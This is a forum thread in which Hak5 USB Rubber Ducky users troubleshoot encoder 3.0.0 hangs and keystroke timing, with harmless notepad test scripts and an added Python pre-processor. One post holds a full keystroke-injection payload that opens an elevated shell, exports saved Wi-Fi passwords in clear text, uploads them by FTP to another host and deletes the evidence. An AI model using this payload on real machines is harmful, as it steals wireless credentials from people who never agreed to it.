j105rob Posted April 4, 2013
Ubuntu 12.04 LTS, JRE 1.7.0_17, Encoder 3.0.0. At the "Encoding Script" step of the encoder, java pegs my CPU at 100% and never gets any further. The payload I am trying to encode is: http://forums.hak5.org/index.php?/topic/29001-payload-wi-fi-password-stealer-payload-with-http-upload-through-bitsadmin/ Any ideas?
no42 Posted April 4, 2013
Have you tried encoder v2.4? (It might help identify the problem.)
j105rob (Author) Posted April 4, 2013 (edited)
Works in 2.4.
Edited April 4, 2013 by j105rob
ApacheTech Consultancy Posted April 4, 2013
Can you run the encoder in debug mode ("--debug" argument)? It should give you a stack trace. Can you also post the script you're using?
j105rob (Author) Posted April 5, 2013
> Can you run the encoder in debug mode ("--debug" argument)? It should give you a stack trace. Can you also post the script you're using?
I ran with --debug before posting the initial question; it produced nothing, it just hung on the encoding step and pegged the CPU. Here is the code:

REM #### win 7 bits upload wlan keys
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
ALT y
DELAY 400
STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear
ENTER
DELAY 200
STRING copy /b /Y %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml
ENTER
STRING echo put %USERPROFILE%\wipass.xml uploads/wipass.xml|ftp -A 192.168.100.115
ENTER
DELAY 2200
STRING quit
ENTER
STRING erase /Q %USERPROFILE%\*.xml
ENTER
DELAY 200
STRING exit
ENTER
no42 Posted April 5, 2013 (edited)
Try removing line 1 (REM ...) and re-encode. I think that might cause the DoS.
Edited April 5, 2013 by midnitesnake
dunce Posted April 8, 2013
> Try removing line 1 (REM ...) and re-encode. I think that might cause the DoS.
Thanks, I was having the same issue, and removing all comment lines allowed the script to encode in version 3.0.0.
ctbram Posted April 18, 2013
I was having the same problem, and removing the REM lines allowed it to complete the encoding. But now I have another issue. I copied the inject.bin to the root of the Ducky SD card and put it into the Ducky. When I insert the Ducky it installs drivers, then pops up a GUI saying "insert disk dell aio (x)", which is a removable drive on my USB printer, and it does not run my script??? The script is simple...

GUI r
DELAY 200
STRING notepad.exe
DELAY 500
STRING Hello World!
ENTER

Does it matter if I compile with the 64-bit or 32-bit Java? I think the default path is going to point me at the 64-bit one.
no42 Posted April 18, 2013
Probably down to the current VID/PID identifiers of the default Duck. Get the VID and PID of your USB keyboard and clone these onto the Duck; it shouldn't ask for drivers, as they're already installed.
ctbram Posted April 18, 2013
Well, I am getting a bit disappointed with this Ducky. I cannot even run this script...

GUI r
STRING notepad.exe
ENTER
DELAY 500
STRING Hello World!
ENTER

I mean SERIOUSLY, can it get any simpler! First I blew several hours because the encoder hangs if you have a REM statement at the start of the txt file! Now I can get it to compile, but it will not complete the GUI r / STRING notepad.exe / ENTER sequence! If I try it I get the pop-up about mounting drive x. If I open notepad before inserting the Ducky I see the Hello World! but not the notepad.exe, so it appears to be getting consumed but never launches notepad! So at this point I don't know if the 3.0 encoder is borked or the Ducky is borked. All I know is if I cannot run a 6-line script this thing is JUNK!
no42 Posted April 18, 2013 (edited)
What firmware are you running? Have you followed the FAQ or the Draft Ducky Guide? Looks like you have read neither, and haven't even bothered to read the previous forum posts or tutorials. You need an initial delay, as the Ducky fires straight away. You need further delays to wait for the OS to catch up with the Ducky:

DELAY 3000
GUI r
DELAY 400
STRING notepad.exe
ENTER
DELAY 400
STRING Hello World!
ENTER

Use encoder v2.4, which is stable (v3.0.0 is experimental; it's only for testing purposes, not general use). If there is anything in the tutorials / FAQ / Guide you want, either speak up or please make one yourself; this project is entirely community driven and welcomes feedback and patches. Your Ducky is not borked, as it's obviously working; the problem is obviously the flow of information, and we need to present it better!
Edited April 18, 2013 by midnitesnake
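The two fixes this thread converges on (deleting REM lines so encoder 3.0.0 gets past the "Encoding Script" hang, and padding the script with an initial delay plus a delay between a launcher key and the next STRING, as in the corrected script above) can be applied mechanically before encoding. The pre-processor below is an added example for this thread; it is not part of the thread's posts or of the Hak5 encoder. The set of "launcher" keys, the 3000 ms and 400 ms defaults (taken from the values suggested above) and the embedded sample script are assumptions constructed for illustration.

```python
"""
Ducky Script pre-processor: strip REM lines and check for missing delays.

Added example, not part of the forum thread or of the Hak5 encoder.
Encoder 3.0.0 hung on scripts that started with a REM line, and scripts that
fire with no leading DELAY, or run STRING straight after GUI r, gave sporadic
results. This tool applies both fixes before the file is encoded.
The launcher-key list and the delay defaults are assumptions, not Hak5 rules.
"""
import sys

# Keys that open something the following STRING has to land in (assumed list).
LAUNCHER_KEYS = {"GUI", "WINDOWS", "CONTROL", "CTRL", "ALT", "CTRL-SHIFT",
                 "CTRL-ALT", "ALT-SHIFT", "COMMAND"}


def _keyword(line):
    """First token of a Ducky Script line, upper-cased ('' for a blank line)."""
    parts = line.split(None, 1)
    return parts[0].upper() if parts else ""


def strip_rem(text):
    """Return [(original_line_no, line)] with REM comments and blank lines removed."""
    kept = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.rstrip("\r\n")
        kw = _keyword(line)
        if kw == "" or kw == "REM":
            continue
        kept.append((no, line))
    return kept


def lint(entries):
    """Return [(original_line_no, message)] for the delay problems seen in the thread."""
    problems = []
    if not entries:
        return [(0, "script is empty after removing comments")]
    if _keyword(entries[0][1]) != "DELAY":
        problems.append((entries[0][0],
                         "no initial DELAY; the Duck types before the host finishes enumerating it"))
    for (_, cur), (nxt_no, nxt) in zip(entries, entries[1:]):
        if _keyword(cur) in LAUNCHER_KEYS and _keyword(nxt) == "STRING":
            problems.append((nxt_no,
                             "STRING immediately after a launcher key; add a DELAY so the window has focus"))
    return problems


def add_delays(entries, initial_ms=3000, between_ms=400):
    """Return the cleaned script lines with the missing delays inserted."""
    out = []
    if entries and _keyword(entries[0][1]) != "DELAY":
        out.append("DELAY %d" % initial_ms)
    for i, (_, line) in enumerate(entries):
        out.append(line)
        nxt = entries[i + 1][1] if i + 1 < len(entries) else ""
        if _keyword(line) in LAUNCHER_KEYS and _keyword(nxt) == "STRING":
            out.append("DELAY %d" % between_ms)
    return out


def preprocess(text):
    """Strip REM lines, report problems, and return (fixed_script_text, problems)."""
    entries = strip_rem(text)
    problems = lint(entries)
    return "\n".join(add_delays(entries)) + "\n", problems


# Constructed sample mirroring the six-line notepad script from the thread,
# with a REM header of the kind that tripped encoder 3.0.0 put back on top.
SAMPLE = """REM hello world test
GUI r
STRING notepad.exe
ENTER
DELAY 500
STRING Hello World!
ENTER
"""

if __name__ == "__main__":
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    fixed, problems = preprocess(src)
    for no, msg in problems:
        sys.stderr.write("line %d: %s\n" % (no, msg))
    sys.stdout.write(fixed)
```

Run it as `python ducky_prep.py payload.txt > payload_clean.txt` and hand the cleaned file to the encoder; warnings go to stderr with the line numbers of the original file. It only removes comment lines and inserts delays; it does not validate the rest of the Ducky Script syntax, and the delay values still have to be tuned for the target host.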
ctbram Posted April 19, 2013
Thanks for the reply. I realized it had something to do with the delays, but I got the code from the wiki, so I assumed it was valid. I just got the device and I have glanced at the FAQ and wiki guide. I just wanted to try something simple to see the device in action. I was concerned that if this could not handle such a simple script it would never handle anything complex. Oh, and I did add 3 sec (3000 ms) delays and got very sporadic results, so I am still on the fence. I will give the 2.4 encoder a shot and play with it more this weekend.
ctbram Posted April 19, 2013
Eureka! Encoder 2.4 works perfectly. Just a little feedback... I do like the output you get from the 3.0.0 version. I can't seem to get --debug to work in either version: in 3.0.0 it encodes but I get no stack dump; in 2.4 it does not encode and I get the default encode output. I have not read the 2.4 docs yet, though, so maybe the flag is not supported. Going to read the docs now that I am getting consistent, predictable results. Thanks again for the reply.
no42 Posted April 19, 2013
Ok, now I need to know:
- firmware version of the Duck
- encoder version
- your payload
- your encoder command
- any output from the encoder
- your language